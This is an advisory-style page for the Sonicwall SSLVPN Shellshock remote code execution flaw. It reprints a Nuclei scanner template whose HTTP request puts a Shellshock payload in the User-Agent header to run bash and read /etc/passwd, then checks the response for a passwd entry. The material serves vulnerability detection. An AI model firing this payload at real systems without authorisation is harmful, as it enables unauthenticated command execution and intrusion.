sonicwall-sslvpn-shellshock: Sonicwall SSLVPN - Remote Code Execution (ShellShock)

日期: 2025-08-01 | 影响软件: Sonicwall SSLVPN | POC: 已公开

漏洞描述

Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.

PoC代码[已公开]

id: sonicwall-sslvpn-shellshock

info:
  name: Sonicwall SSLVPN - Remote Code Execution (ShellShock)
  author: PR3R00T
  severity: critical
  description: |
    Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
  reference:
    - https://twitter.com/chybeta/status/1353974652540882944
    - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: shellshock,sonicwall,rce,vpn,vuln

http:
  - raw:
      - |
        GET /cgi-bin/jarrewrite.sh HTTP/1.1
        Host: {{Hostname}}
        User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008561b3a838b257c2fe9050622416724099868c1aa762df6aa064ed49e572247d0220126710c4cb9ed25ffef79d6896df61e68f3e770c3707be07e8b9900be6648241:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml